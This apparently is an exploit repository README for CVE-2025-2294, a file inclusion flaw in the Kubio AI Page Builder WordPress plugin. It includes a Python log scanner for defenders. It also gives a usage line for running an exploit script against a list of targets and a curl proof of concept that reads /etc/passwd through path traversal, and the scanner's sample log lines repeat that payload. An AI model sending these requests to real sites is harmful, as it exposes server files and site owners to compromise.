# CVE-2025-2294
# 🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱
## 🔍 Overview
**CVE-2025-2294** is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** 👾 to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.
Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.
## 👤 Author
**Muhammad Nizar** — Security Researcher 🔐
GitHub: [0xWhoami35](https://github.com/0xWhoami35)
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) ▶️
---
*Feel free to reach out for questions or collaboration! 🤝*
---
## 📋 Affected Versions
- Kubio AI Page Builder plugin ≤ 2.5.1 🛠️
---
## 🧰 Usage
Run the exploit script with a list of target URLs:
```bash
python3 lfi.py -l list.txt
```
## ⚠️ Vulnerability Details
- **Type:** Local File Inclusion (LFI) 🕳️
- **Severity:** Critical (CVSS 9.8) 🔥
- **Attack Vector:** Remote, unauthenticated 🌐
- **Impact:** Confidentiality, Integrity, Availability 🔐
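
For defenders, the following is an added example (not part of the original repository or the plugin's code): it scans web-server access logs for requests that pass path-traversal values in the `__kubio-site-edit-iframe-classic-template` parameter. The combined log format, the sample lines, and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "__kubio-site-edit-iframe-classic-template"  # parameter named in the advisory
# Client IP, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges); "index" is a made-up benign value.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.5.0"',
    '203.0.113.7 - - [01/Apr/2025:10:00:05 +0000] "GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "-"',
    '198.51.100.20 - - [01/Apr/2025:10:02:11 +0000] "GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=index HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [01/Apr/2025:10:03:40 +0000] "GET /blog/?p=12 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding, bounded so hostile input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return why a parameter value looks like a file path escape, or None."""
    v = fully_decode(value).replace("\\", "/")
    if "\x00" in v:
        return "null byte"
    if ".." in v.split("/"):
        return "parent-directory segment"
    if v.startswith("/") or re.match(r"^[A-Za-z]:/", v):
        return "absolute path"
    return None

def scan(lines):
    """Return (ip, status, reason, decoded_value) for each suspicious use of PARAM."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            reason = classify(value) if key == PARAM else None
            if reason:
                hits.append((m["ip"], int(m["status"]), reason, fully_decode(value)))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit with a `200` status is worth prioritising during triage, since it indicates the server answered the request rather than rejecting it.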
---
## 🧪 Proof of Concept (PoC)
```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
```